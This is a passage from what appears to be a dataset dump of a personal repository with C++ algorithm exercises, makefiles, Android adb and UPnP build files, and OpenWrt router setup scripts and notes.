vec[j] = temp;\r\n}\t\t// ---------- end of function swap ----------\r\n\r\nint partition(int_vector& vec)\r\n{\r\n if(vec.size() == 1)\r\n return 0;\r\n int i = 0, j = 1;\r\n int r = random() % vec.size();\r\n swap(vec, 0, r); \r\n int pivot = vec[0];\r\n\r\n while(j < vec.size())\r\n {\r\n if(vec[j] <= pivot)\r\n {\r\n int temp = vec[j];\r\n vec[j] = vec[i+1];\r\n vec[i] = 
temp;\r\n ++i;\r\n }\r\n ++j;\r\n }\r\n vec[i] = pivot;\r\n\r\n return i;\r\n}\t\t// ---------- end of function partition ----------\r\n\r\nvoid quickSort(int_vector& vec)\r\n{\r\n if(vec.size() < 2)\r\n return;\r\n int p = partition(vec);\r\n int pivot = vec[p];\r\n int_vector low, high;\r\n high.insert(high.begin(), vec.begin()+p+1, vec.end());\r\n low.insert(low.begin(), vec.begin(), vec.begin()+p);\r\n vec.clear();\r\n quickSort(low);\r\n quickSort(high);\r\n vec.insert(vec.end(), low.begin(), low.end());\r\n vec.push_back(pivot);\r\n vec.insert(vec.end(), high.begin(), high.end());\r\n}\t\t// ---------- end of function quickSort----------\r\n\r\nint getKthItem (int_vector& vec, int k)\r\n{\r\n assert(k <= vec.size());\r\n int i = 0;\r\n i = partition(vec);\r\n if(i == k - 1)\r\n return vec[i];\r\n else\r\n {\r\n if(i > k - 1)\r\n {\r\n vec.erase(vec.begin() + i, vec.end());\r\n return getKthItem(vec, k);\r\n }\r\n else\r\n {\r\n vec.erase(vec.begin(), vec.begin() + i + 1);\r\n return getKthItem(vec, k-i-1);\r\n }\r\n }\r\n}\t\t// ----- end of function getIthItem -----\r\n\r\nvoid printVec (const int_vector& vec)\r\n{\r\n for each(int i in vec)\r\n std::cout << i << \" \";\r\n std::cout << std::endl;\r\n}\t\t// ----- end of function printVec -----\r\n\r\nint main ( int argc, char *argv[] )\r\n{\r\n int_vector vec;\r\n int size = 5;\r\n if(argc > 1)\r\n size = atoi(argv[1]);\r\n for(int i = 0; i < size; ++i)\r\n vec.push_back(random()%100);\r\n printVec(vec);\r\n// quickSort(vec);\r\n// printVec(vec);\r\n std::cout << getKthItem(vec, 3) << std::endl;\r\n return 0;\r\n}\t\t// ---------- end of function main ----------\r\n" }, { "alpha_fraction": 0.743842363357544, "alphanum_fraction": 0.7536945939064026, "avg_line_length": 21.55555534362793, "blob_id": "b43ac6620b30bc6d3d5181512aa83d4cc97b264b", "content_id": "1c01d6f526e05feaec5c99e46f94088f244e80ef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 203, "license_type": "permissive", "max_line_length": 51, "num_lines": 9, "path": "/seminars/alsa_introduction/makefile", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "all: ppt\n\nimg:\n\tdot -o history.png -Tpng history.dot\n\tdot -o architecture.png -Tpng architecture.dot\n\tdot -o architecture_2.png -Tpng architecture_2.dot\n\nppt: img\n\txelatex -interaction=nonstopmode *.tex\n" }, { "alpha_fraction": 0.7234042286872864, "alphanum_fraction": 0.7276595830917358, "avg_line_length": 11.368420600891113, "blob_id": "091f89f5755517b9f307e95991e06a352140ba98", "content_id": "200222371d3dd6cd72804ddb4c21f5db00979800", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 235, "license_type": "permissive", "max_line_length": 30, "num_lines": 19, "path": "/android/pupnp_jni/Makefile", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "all: jni java\n\n.PHONY: jni install clean java\n\njni:\n\tndk-build -C jni V=1\n\njava:\n\tant clean\n\tant debug\n\ninstall:\n\tadb uninstall com.rmd.tpupnp\n\tant debug install\n\nclean:\n\tadb uninstall com.rmd.tpupnp\n\tndk-build -C jni clean\n\tant clean\n" }, { "alpha_fraction": 0.6662589311599731, "alphanum_fraction": 0.6835881471633911, "avg_line_length": 25.22994613647461, "blob_id": "40b4b78a37856453f568199600136352adfc9527", "content_id": "28757a9dad756725838d48f3344c4d1f48469156", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": 
"C", "length_bytes": 4905, "license_type": "permissive", "max_line_length": 78, "num_lines": 187, "path": "/android/pupnp_jni/jni/build/inc/autoconfig.h", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/* autoconfig.h. Generated from autoconfig.h.in by configure. */\n/* autoconfig.h.in. Generated from configure.ac by autoheader. */\n\n/* Define to 1 to compile debug code */\n/* #undef DEBUG */\n\n/* Define to 1 if you have the <arpa/inet.h> header file. */\n#define HAVE_ARPA_INET_H 1\n\n/* Define to 1 if you have the <dlfcn.h> header file. */\n#define HAVE_DLFCN_H 1\n\n/* Define to 1 if you don't have `vprintf' but do have `_doprnt.' */\n/* #undef HAVE_DOPRNT */\n\n/* Define to 1 if you have the <fcntl.h> header file. */\n#define HAVE_FCNTL_H 1\n\n/* Define to 1 if fseeko (and presumably ftello) exists and is declared. */\n#define HAVE_FSEEKO 1\n\n/* Define to 1 if you have the <inttypes.h> header file. */\n#define HAVE_INTTYPES_H 1\n\n/* Define to 1 if you have the <limits.h> header file. */\n#define HAVE_LIMITS_H 1\n\n/* Define to 1 if you have the <memory.h> header file. */\n#define HAVE_MEMORY_H 1\n\n/* Define to 1 if you have the <netdb.h> header file. */\n#define HAVE_NETDB_H 1\n\n/* Define to 1 if you have the <netinet/in.h> header file. */\n#define HAVE_NETINET_IN_H 1\n\n/* Define if you have POSIX threads libraries and header files. */\n#define HAVE_PTHREAD 1\n\n/* Define to 1 if you have the <stdint.h> header file. */\n#define HAVE_STDINT_H 1\n\n/* Define to 1 if you have the <stdlib.h> header file. */\n#define HAVE_STDLIB_H 1\n\n/* Define to 1 if you have the <strings.h> header file. */\n#define HAVE_STRINGS_H 1\n\n/* Define to 1 if you have the <string.h> header file. */\n#define HAVE_STRING_H 1\n\n/* Defines if strndup is available on your system */\n#define HAVE_STRNDUP 1\n\n/* Defines if strnlen is available on your system */\n#define HAVE_STRNLEN 1\n\n/* Define to 1 if you have the <syslog.h> header file. */\n#define HAVE_SYSLOG_H 1\n\n/* Define to 1 if you have the <sys/ioctl.h> header file. */\n#define HAVE_SYS_IOCTL_H 1\n\n/* Define to 1 if you have the <sys/socket.h> header file. */\n#define HAVE_SYS_SOCKET_H 1\n\n/* Define to 1 if you have the <sys/stat.h> header file. */\n#define HAVE_SYS_STAT_H 1\n\n/* Define to 1 if you have the <sys/time.h> header file. */\n#define HAVE_SYS_TIME_H 1\n\n/* Define to 1 if you have the <sys/types.h> header file. */\n#define HAVE_SYS_TYPES_H 1\n\n/* Define to 1 if you have the <unistd.h> header file. */\n#define HAVE_UNISTD_H 1\n\n/* Define to 1 if you have the `vprintf' function. */\n#define HAVE_VPRINTF 1\n\n/* Define to 1 if you have the <ws2tcpip.h> header file. */\n/* #undef HAVE_WS2TCPIP_H */\n\n/* Define to the sub-directory in which libtool stores uninstalled libraries.\n */\n#define LT_OBJDIR \".libs/\"\n\n/* Define to 1 to prevent compilation of assert() */\n#define NDEBUG 1\n\n/* Define to 1 to prevent some debug code */\n#define NO_DEBUG 1\n\n/* Define to 1 if your C compiler doesn't accept -c and -o together. */\n/* #undef NO_MINUS_C_MINUS_O */\n\n/* Name of package */\n#define PACKAGE \"libupnp\"\n\n/* Define to the address where bug reports for this package should be sent. */\n#define PACKAGE_BUGREPORT \"[email protected]\"\n\n/* Define to the full name of this package. */\n#define PACKAGE_NAME \"libupnp\"\n\n/* Define to the full name and version of this package. */\n#define PACKAGE_STRING \"libupnp 1.8.0\"\n\n/* Define to the one symbol short name of this package. 
*/\n#define PACKAGE_TARNAME \"libupnp\"\n\n/* Define to the home page for this package. */\n#define PACKAGE_URL \"\"\n\n/* Define to the version of this package. */\n#define PACKAGE_VERSION \"1.8.0\"\n\n/* Define to necessary symbol if this constant uses a non-standard name on\n your system. */\n/* #undef PTHREAD_CREATE_JOINABLE */\n\n/* Define to 1 if you have the ANSI C header files. */\n#define STDC_HEADERS 1\n\n/* see upnpconfig.h */\n#define UPNP_ENABLE_BLOCKING_TCP_CONNECTIONS 1\n\n/* see upnpconfig.h */\n/* #undef UPNP_ENABLE_IPV6 */\n\n/* see upnpconfig.h */\n#define UPNP_ENABLE_NOTIFICATION_REORDERING 1\n\n/* see upnpconfig.h */\n#define UPNP_HAVE_CLIENT 1\n\n/* see upnpconfig.h */\n/* #undef UPNP_HAVE_DEBUG */\n\n/* see upnpconfig.h */\n#define UPNP_HAVE_DEVICE 1\n\n/* see upnpconfig.h */\n#define UPNP_HAVE_TOOLS 1\n\n/* see upnpconfig.h */\n#define UPNP_HAVE_WEBSERVER 1\n\n/* Do not use pthread_rwlock_t */\n#define UPNP_USE_RWLOCK 1\n\n/* see upnpconfig.h */\n#define UPNP_VERSION_MAJOR 1\n\n/* see upnpconfig.h */\n#define UPNP_VERSION_MINOR 8\n\n/* see upnpconfig.h */\n#define UPNP_VERSION_PATCH 0\n\n/* see upnpconfig.h */\n#define UPNP_VERSION_STRING \"1.8.0\"\n\n/* Version number of package */\n#define VERSION \"1.8.0\"\n\n/* File Offset size */\n#define _FILE_OFFSET_BITS 64\n\n/* Define to 1 to make fseeko visible on some hosts (e.g. glibc 2.2). */\n/* #undef _LARGEFILE_SOURCE */\n\n/* Large files support */\n#define _LARGE_FILE_SOURCE /**/\n\n/* Define to empty if `const' does not conform to ANSI C. */\n/* #undef const */\n\n/* Define to `long int' if <sys/types.h> does not define. */\n/* #undef off_t */\n\n/* Define to `unsigned int' if <sys/types.h> does not define. */\n/* #undef size_t */\n\n/* Type for storing the length of struct sockaddr */\n/* #undef socklen_t */\n" }, { "alpha_fraction": 0.7207792401313782, "alphanum_fraction": 0.7727272510528564, "avg_line_length": 153, "blob_id": "f9ee16fc0a85b40b935e439225845a52f64d8b4e", "content_id": "f9b1fff925ad850de713abfc9f95bc97675a3ada", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 308, "license_type": "permissive", "max_line_length": 167, "num_lines": 2, "path": "/settings/openwrt/readme_for_dir-505.md", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "the default wan interface for dir-505 is eth1, so when we want to use pdnsd as dns cache, do remeber to change the interface=eth0 to interface=eth1 in pdnsd.conf file.\nand the dns for dnsmasq doesn't work, so it's a better idea to forward dns query to pdnsd by adding 'server=127.0.0.1#1053' in dnsmasq.conf\n" }, { "alpha_fraction": 0.5510146617889404, "alphanum_fraction": 0.5697575807571411, "avg_line_length": 25.878787994384766, "blob_id": "4a72fb891aaee768ab088c756c5f4219c0c62c10", "content_id": "c528d1f8b850ef363ab5dbe42c3374251ca3144e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 7096, "license_type": "permissive", "max_line_length": 125, "num_lines": 264, "path": "/android/adb/transport_local.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2007 The Android Open Source Project\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable 
law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <errno.h>\n\n#include \"sysdeps.h\"\n#include <sys/types.h>\n\n#define TRACE_TAG TRACE_TRANSPORT\n#include \"adb.h\"\n\n#ifdef __ppc__\n#define H4(x)\t(((x) & 0xFF000000) >> 24) | (((x) & 0x00FF0000) >> 8) | (((x) & 0x0000FF00) << 8) | (((x) & 0x000000FF) << 24)\nstatic inline void fix_endians(apacket *p)\n{\n p->msg.command = H4(p->msg.command);\n p->msg.arg0 = H4(p->msg.arg0);\n p->msg.arg1 = H4(p->msg.arg1);\n p->msg.data_length = H4(p->msg.data_length);\n p->msg.data_check = H4(p->msg.data_check);\n p->msg.magic = H4(p->msg.magic);\n}\n#else\n#define fix_endians(p) do {} while (0)\n#endif\n\n#if ADB_HOST\n/* we keep a list of opened transports, transport 0 is bound to 5555,\n * transport 1 to 5557, .. transport n to 5555 + n*2. the list is used\n * to detect when we're trying to connect twice to a given local transport\n */\n#define ADB_LOCAL_TRANSPORT_MAX 16\n\nADB_MUTEX_DEFINE( local_transports_lock );\n\nstatic atransport* local_transports[ ADB_LOCAL_TRANSPORT_MAX ];\n#endif /* ADB_HOST */\n\nstatic int remote_read(apacket *p, atransport *t)\n{\n if(readx(t->sfd, &p->msg, sizeof(amessage))){\n D(\"remote local: read terminated (message)\\n\");\n return -1;\n }\n\n fix_endians(p);\n\n#if 0 && defined __ppc__\n D(\"read remote packet: %04x arg0=%0x arg1=%0x data_length=%0x data_check=%0x magic=%0x\\n\",\n p->msg.command, p->msg.arg0, p->msg.arg1, p->msg.data_length, p->msg.data_check, p->msg.magic);\n#endif\n if(check_header(p)) {\n D(\"bad header: terminated (data)\\n\");\n return -1;\n }\n\n if(readx(t->sfd, p->data, p->msg.data_length)){\n D(\"remote local: terminated (data)\\n\");\n return -1;\n }\n\n if(check_data(p)) {\n D(\"bad data: terminated (data)\\n\");\n return -1;\n }\n\n return 0;\n}\n\nstatic int remote_write(apacket *p, atransport *t)\n{\n int length = p->msg.data_length;\n\n fix_endians(p);\n\n#if 0 && defined __ppc__\n D(\"write remote packet: %04x arg0=%0x arg1=%0x data_length=%0x data_check=%0x magic=%0x\\n\",\n p->msg.command, p->msg.arg0, p->msg.arg1, p->msg.data_length, p->msg.data_check, p->msg.magic);\n#endif\n if(writex(t->sfd, &p->msg, sizeof(amessage) + length)) {\n D(\"remote local: write terminated\\n\");\n return -1;\n }\n\n return 0;\n}\n\n\nint local_connect(int port)\n{\n char buf[64];\n int fd = -1;\n\n#if ADB_HOST\n const char *host = getenv(\"ADBHOST\");\n if (host) {\n fd = socket_network_client(host, port, SOCK_STREAM);\n }\n#endif\n if (fd < 0) {\n fd = socket_loopback_client(port, SOCK_STREAM);\n }\n\n if (fd >= 0) {\n D(\"client: connected on remote on fd %d\\n\", fd);\n close_on_exec(fd);\n disable_tcp_nagle(fd);\n snprintf(buf, sizeof buf, \"%s%d\", LOCAL_CLIENT_PREFIX, port - 1);\n register_socket_transport(fd, buf, port, 1);\n return 0;\n }\n return -1;\n}\n\n\nstatic void *client_socket_thread(void *x)\n{\n#if ADB_HOST\n int port = ADB_LOCAL_TRANSPORT_PORT;\n int count = ADB_LOCAL_TRANSPORT_MAX;\n\n D(\"transport: client_socket_thread() starting\\n\");\n\n /* try to connect to any number of running emulator instances */\n /* this is only done when ADB starts up. 
later, each new emulator */\n /* will send a message to ADB to indicate that is is starting up */\n for ( ; count > 0; count--, port += 2 ) {\n (void) local_connect(port);\n }\n#endif\n return 0;\n}\n\nstatic void *server_socket_thread(void * arg)\n{\n int serverfd, fd;\n struct sockaddr addr;\n socklen_t alen;\n int port = (int)arg;\n\n D(\"transport: server_socket_thread() starting\\n\");\n serverfd = -1;\n for(;;) {\n if(serverfd == -1) {\n serverfd = socket_inaddr_any_server(port, SOCK_STREAM);\n if(serverfd < 0) {\n D(\"server: cannot bind socket yet\\n\");\n adb_sleep_ms(1000);\n continue;\n }\n close_on_exec(serverfd);\n }\n\n alen = sizeof(addr);\n D(\"server: trying to get new connection from %d\\n\", port);\n fd = adb_socket_accept(serverfd, &addr, &alen);\n if(fd >= 0) {\n D(\"server: new connection on fd %d\\n\", fd);\n close_on_exec(fd);\n disable_tcp_nagle(fd);\n register_socket_transport(fd, \"host\", port, 1);\n }\n }\n D(\"transport: server_socket_thread() exiting\\n\");\n return 0;\n}\n\nvoid local_init(int port)\n{\n adb_thread_t thr;\n void* (*func)(void *);\n\n if(HOST) {\n func = client_socket_thread;\n } else {\n func = server_socket_thread;\n }\n\n D(\"transport: local %s init\\n\", HOST ? \"client\" : \"server\");\n\n if(adb_thread_create(&thr, func, (void *)port)) {\n fatal_errno(\"cannot create local socket %s thread\",\n HOST ? \"client\" : \"server\");\n }\n}\n\nstatic void remote_kick(atransport *t)\n{\n int fd = t->sfd;\n t->sfd = -1;\n adb_close(fd);\n\n#if ADB_HOST\n if(HOST) {\n int nn;\n adb_mutex_lock( &local_transports_lock );\n for (nn = 0; nn < ADB_LOCAL_TRANSPORT_MAX; nn++) {\n if (local_transports[nn] == t) {\n local_transports[nn] = NULL;\n break;\n }\n }\n adb_mutex_unlock( &local_transports_lock );\n }\n#endif\n}\n\nstatic void remote_close(atransport *t)\n{\n adb_close(t->fd);\n}\n\nint init_socket_transport(atransport *t, int s, int port, int local)\n{\n int fail = 0;\n\n t->kick = remote_kick;\n t->close = remote_close;\n t->read_from_remote = remote_read;\n t->write_to_remote = remote_write;\n t->sfd = s;\n t->sync_token = 1;\n t->connection_state = CS_OFFLINE;\n t->type = kTransportLocal;\n\n#if ADB_HOST\n if (HOST && local) {\n adb_mutex_lock( &local_transports_lock );\n {\n int index = (port - ADB_LOCAL_TRANSPORT_PORT)/2;\n\n if (!(port & 1) || index < 0 || index >= ADB_LOCAL_TRANSPORT_MAX) {\n D(\"bad local transport port number: %d\\n\", port);\n fail = -1;\n }\n else if (local_transports[index] != NULL) {\n D(\"local transport for port %d already registered (%p)?\\n\",\n port, local_transports[index]);\n fail = -1;\n }\n else\n local_transports[index] = t;\n }\n adb_mutex_unlock( &local_transports_lock );\n }\n#endif\n return fail;\n}\n" }, { "alpha_fraction": 0.7816244959831238, "alphanum_fraction": 0.7869507074356079, "avg_line_length": 33.1363639831543, "blob_id": "5e94023c317b545ef56f42f9c40dea27b1e969b9", "content_id": "651ef45a581275820d4e5f5d0c696c3160ee6df0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 751, "license_type": "permissive", "max_line_length": 123, "num_lines": 22, "path": "/settings/openwrt/setup.sh", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "# use http://mirrors.ustc.edu.cn/openwrt/ instead of http://downloads.openwrt.org in opkg cfg (/etc/opkg/) to improve speed\nopkg update\n# for usb devices \nopkg install kmod-usb-storage \n# for fstab mount and ext4 file system\nopkg install block-mount kmod-fs-ext4\n# to 
use ext disk for software storage\n# mount /dev/sda1 /overlay\n# for ntfs file system\nopkg install ntfs-3g samba luci-app-samba\n\nopkg install iptables-mod-nat-extra\n\nopkg install pdnsd\n# or consider using dnscrypt-proxy, edit /etc/config/dnscrypt-proxy after installation\n\nopkg install libpolarssl\n# download shadowsocks from: https://github.com/shadowsocks/openwrt-shadowsocks\n# update /etc/shadowsocks/config.json accordingly\n\n/etc/init.d/pdnsd enable\n/etc/init.d/shadowsocks enable\n" }, { "alpha_fraction": 0.5007225275039673, "alphanum_fraction": 0.5158959627151489, "avg_line_length": 28.446807861328125, "blob_id": "1fca3aefab1981000198dabc6e5173cef04d38a7", "content_id": "8ac23ce8a4d08cf9a6c08b5a4ab6569c8ae38457", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1384, "license_type": "permissive", "max_line_length": 262, "num_lines": 47, "path": "/algorithm/leetcode/3_longest_substring_without_repeating_characters.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n *\n * http://leetcode.com/onlinejudge#question_3\n *\n * Longest Substring Without Repeating Characters May 16 '114362 / 13161\n *\n * Given a string, find the length of the longest substring without repeating characters. For example, the longest substring without repeating letters for \"abcabcbb\" is \"abc\", which the length is 3. For \"bbbbb\" the longest substring is \"b\", with the length of 1.\n *\n */\n\n#include <iostream>\n#include <set>\n#include <string>\n\nusing namespace std;\nclass Solution {\n public:\n int lengthOfLongestSubstring(string s) {\n set<char> appeared_chars;\n int count = 0;\n int max_count = 0;\n \n for(int i = 0; i < s.length(); ++i) {\n for(int j = i; j < s.length(); ++j) {\n if(appeared_chars.end() == appeared_chars.find(s[j])) {\n appeared_chars.insert(s[j]);\n ++count;\n }\n else\n break;\n }\n if(count > max_count)\n max_count = count;\n appeared_chars.clear();\n count = 0;\n }\n\n return max_count;\n }\n};\n\nint main(int argc, const char *argv[]) {\n Solution slu;\n string s(\"abcdcefcg\");\n cout << slu.lengthOfLongestSubstring(s) << endl;\n return 0;\n}\n" }, { "alpha_fraction": 0.5562219023704529, "alphanum_fraction": 0.5712143778800964, "avg_line_length": 22, "blob_id": "e5fbe87b3683cbb6d8cc0743305bc8d0265dc050", "content_id": "7bb187dd446d2ece08fc6829dad26f138b8c6f60", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 667, "license_type": "permissive", "max_line_length": 70, "num_lines": 29, "path": "/tools/perror/perror.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// perror is available in mysql package on osx, install with homebrew\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <errno.h>\n\nstatic void print_usage() {\n printf(\"perror, convert error code(decimal) to description text\\n\"\n \" usage: perror errorno\\n\");\n}\n\nint main(int argc, const char *argv[])\n{\n int err = 0;\n if(argc != 2) {\n print_usage();\n return 1;\n }\n err = strtol(argv[1], NULL, 10);\n if(errno == EINVAL || errno == ERANGE) {\n fprintf(stderr, \"error code is invalid\\n\");\n return 1;\n }\n if(err < 0)\n err = -1*err;\n printf(\"%s\\n\", strerror(err));\n return 0;\n}\n" }, { "alpha_fraction": 0.7426160573959351, "alphanum_fraction": 0.7510548233985901, "avg_line_length": 22.700000762939453, "blob_id": "be1fb3e23c9539e617e2486d5fbdd4b89e78c86e", "content_id": 
"01a6bb4499631909fb016ec11deb77a47f5955a1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 237, "license_type": "permissive", "max_line_length": 52, "num_lines": 10, "path": "/seminars/sqlserver_on_vsphere_best_practices/makefile", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "all: ppt\n\nimg:\n\t#dot -o history.png -Tpng history.dot\n\t#dot -o architecture.png -Tpng architecture.dot\n\t#dot -o architecture_2.png -Tpng architecture_2.dot\n\nppt: img\n\txelatex -interaction=nonstopmode *.tex\n\topen sqlserver_on_vsphere.pdf\n" }, { "alpha_fraction": 0.6871921420097351, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 19.299999237060547, "blob_id": "b4fab13424f0a2e7a3e3e5789bd56e022dfc2e43", "content_id": "a288d7a02f43580378bf0b70ea85ecf9eb06759e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 406, "license_type": "permissive", "max_line_length": 83, "num_lines": 20, "path": "/settings/openwrt/readme.md", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "To mount additional usb devices to file system, add below contents to /etc/rc.local\n\n'''\nif [ -b /dev/sda2 ]; then\n mkdir -p /mnt/ext\n mount -t ext4 /dev/sda2 /mnt/ext\n mount -t ext4 /dev/sda2 /overlay\nfi\n'''\n\nMake sure required file systems are installed via opkg\n\n\n## Installation for normal openwrt router\n\n- run setup.sh\n\n## Installation for dir-505 openwrt router\n\n- refer to readme_for_dir-505.md\n" }, { "alpha_fraction": 0.559440553188324, "alphanum_fraction": 0.6223776340484619, "avg_line_length": 19.428571701049805, "blob_id": "0eccf290b3512db88e6bbf7551e642cbdb64669e", "content_id": "bf923ba5cecfc1a4128f136b25d9dcc21f3d797e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 143, "license_type": "permissive", "max_line_length": 45, "num_lines": 7, "path": "/settings/btsync/start_btsync.sh", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nif [ -b /dev/sda1 ]; then\n mkdir -p /mnt/data\n mount -t ext4 /dev/sda1 /mnt/data\n btsync --nodaemon --webui.listen 0.0.0.0:80\nfi\n" }, { "alpha_fraction": 0.39830905199050903, "alphanum_fraction": 0.4194457530975342, "avg_line_length": 22.44827651977539, "blob_id": "3316d1307f9d0e0c5d979a8cb1cc8b9de36b1fdb", "content_id": "88a94e93c29876d32942956c073829067d6564e3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2129, "license_type": "permissive", "max_line_length": 88, "num_lines": 87, "path": "/algorithm/i2a_ex_9.3-8/ex9_3_8.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\r\n// \r\n// Filename: 9_3_8.cpp\r\n// \r\n// Description: solution to exercise 9.3-8 of Introduction to algorithms\r\n// \r\n// Version: 1.0\r\n// Created: 12/16/2009 7:44:56 PM\r\n// Revision: none\r\n// Compiler: cl.exe\r\n// \r\n// Author: Raymond Wen (), \r\n// Company: \r\n// \r\n// =====================================================================================\r\n\r\n#include\t<time.h>\r\n#include\t<cstdlib>\r\n#include\t<vector>\r\n#include\t<iostream>\r\n\r\ntypedef std::vector<int> int_vector;\r\n\r\nint random()\r\n{\r\n static int initialized = false;\r\n if(!initialized)\r\n {\r\n 
srand(static_cast<unsigned int>(time(NULL)));\r\n initialized = true;\r\n }\r\n\r\n return rand();\r\n}\t\t// ---------- end of function random ----------\r\n\r\nvoid printVec (const int_vector& vec)\r\n{\r\n for each(int i in vec)\r\n std::cout << i << \" \";\r\n std::cout << std::endl;\r\n}\t\t// ----- end of function printVec -----\r\n\r\nint getMedian(const int_vector& x, int lx, int hx, const int_vector& y, int ly, int hy)\r\n{\r\n int cx, cy, mx, my, z = 0;\r\n cx = (lx+hx)/2;\r\n cy = hy-(cx-lx);\r\n mx = x[cx];\r\n my = y[cy];\r\n if(mx <= my)\r\n {\r\n if(cy < 1 || mx >= y[cy-1])\r\n return mx;\r\n else\r\n return getMedian(x, cx+1, hx, y, ly, cy-1);\r\n }\r\n else\r\n {\r\n if(cx < 1 || my >= x[cx-1])\r\n return my;\r\n else\r\n return getMedian(x, lx, cx-1, y, cy+1, hy);\r\n }\r\n}\r\n\r\nint main ( int argc, char *argv[] )\r\n{\r\n int n = 8;\r\n const int limit = 100;\r\n if(argc > 1)\r\n n = atoi(argv[1]);\r\n int_vector x,y;\r\n int xbase = 0, ybase = 0;\r\n for(int i = 0; i < n; ++i)\r\n {\r\n xbase += random() % limit;\r\n ybase += random() % limit;\r\n x.push_back(xbase);\r\n y.push_back(ybase);\r\n }\r\n printVec(x);\r\n printVec(y);\r\n\r\n int z = getMedian(x, 0, x.size()-1, y, 0, y.size()-1);\r\n std::cout << z << std::endl;\r\n return 0;\r\n}\t // ---------- end of function main ----------\r\n\r\n" }, { "alpha_fraction": 0.704402506351471, "alphanum_fraction": 0.704402506351471, "avg_line_length": 16.66666603088379, "blob_id": "58d484eb980405696135692eadb7584f3beba2d5", "content_id": "0b6cf4e37dca5bcfeeebcb6f8b738ad1a9d7b59b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 318, "license_type": "permissive", "max_line_length": 40, "num_lines": 18, "path": "/android/exosip_sample/sip_exe/jni/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH:= $(call my-dir)\ninclude $(CLEAR_VARS)\n\nLOCAL_SRC_FILES:= \\\n\t\tsipexe.cpp\n\nLOCAL_CFLAGS +=\t-DOSIP_MT -DENABLE_TRACE\n\nLOCAL_SHARED_LIBRARIES := \\\n libosip libexosip\n\nLOCAL_LDLIBS += -llog\n\nLOCAL_MODULE:= sipexe\n\ninclude $(BUILD_EXECUTABLE)\n$(call import-module,libosip)\n$(call import-module,libexosip)\n" }, { "alpha_fraction": 0.7033247947692871, "alphanum_fraction": 0.7033247947692871, "avg_line_length": 20.66666603088379, "blob_id": "59cc9b446a8406ddb39019cafa8d0a93be645357", "content_id": "151d05b705c2da4504101106141d8a41a4fca20f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 391, "license_type": "permissive", "max_line_length": 84, "num_lines": 18, "path": "/android/logtest/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH:= $(call my-dir)\ninclude $(CLEAR_VARS)\n\nLOCAL_SRC_FILES:= \\\n\tlogtest.cpp\n\nLOCAL_SHARED_LIBRARIES := \\\n\tlibcutils\n\n# LOCAL_C_INCLUDES := $(LOCAL_PATH)/include\n\n# LOCAL_CFLAGS := -DMACRO_DEF\n\nLOCAL_MODULE:= logtest \n\ninclude $(BUILD_EXECUTABLE) \n# $(BUILD_SHARED_LIBRARY) $(BUILD_STATIC_LIBRARY)\n# $(BUILD_HOST_EXECUTABLE) $(BUILD_HOST_SHARED_LIBRARY) $(BUILD_HOST_STATIC_LIBRARY)\n\n" } ]
75
popazerty/eve-browser
https://github.com/popazerty/eve-browser
e1e6dc1118c0d47e7f55b9ae51b285680788f5b6
3010ae530971ca87b1e82ab42e11f2a304177225
064d5a571951cdade92bb1d2eab767ec37512c40
refs/heads/master
2021-01-19T21:48:16.321324
2014-11-23T08:04:20
2014-11-23T08:04:20
null
0
0
null
null
null
null
null
